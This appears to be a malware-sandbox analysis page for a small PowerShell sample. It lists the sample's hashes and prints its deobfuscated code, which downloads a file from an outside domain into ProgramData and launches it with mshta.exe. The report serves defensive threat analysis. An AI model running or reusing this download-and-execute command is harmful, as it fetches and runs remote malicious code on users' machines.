General
Structural Analysis
Config.0
Yara Rules4
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
|
Hash | Hash Value |
|---|---|
| MD5 | a1fdf665dab23f6c0961033990a37faf
|
| Sha1 | 78f0c3bd359ab30dd237e5a099abe63ea81b6255
|
| Sha256 | b55c72632ad93fa35a1e414a06f3ae266ff0a360748d79f5df0c5a9af35d3279
|
| Sha384 | 9966b1b99fa73c8c878ba94a63685edb7ebb5dd1cf6d008ac14d93fae8996aca4ff16a9804625c7d41a7bb2a37102329
|
| Sha512 | 8ad1ff8062d45138f4b419a1a592d268e0dfad349d32894842bf005e3e92492b66bd6e48843df9edf250a2224471a2e2ad6c71a8af640edd6140ca3d81a76527
|
| SSDeep | 3:VSJJFISFeBIFgYCDbWKsT1p3hyxHWX7sV2Av:s8SFZCDqhyzT
|
File Structure
Artefacts
|
Name0 | Value |
|---|---|
| Deobfuscated PowerShell | $u = "https://bilkaso.com/apd" $p = $env:PROGRAMDATA + "\vc.html" Invoke-WebRequest $u -O $p start "mshta.exe" $p |
a1fdf665dab23f6c0961033990a37faf (121 B)
File Structure
Characteristics
No malware configuration were found at this point.
Artefacts
|
Name0 | Value | Location |
|---|---|---|
| Deobfuscated PowerShell | $u = "https://bilkaso.com/apd" $p = $env:PROGRAMDATA + "\vc.html" Invoke-WebRequest $u -O $p start "mshta.exe" $p Malicious |
a1fdf665dab23f6c0961033990a37faf > [PowerShell Command] |
You must be signed in to post a comment.
You need a premium account to access this feature.
You must be signed in to post a comment.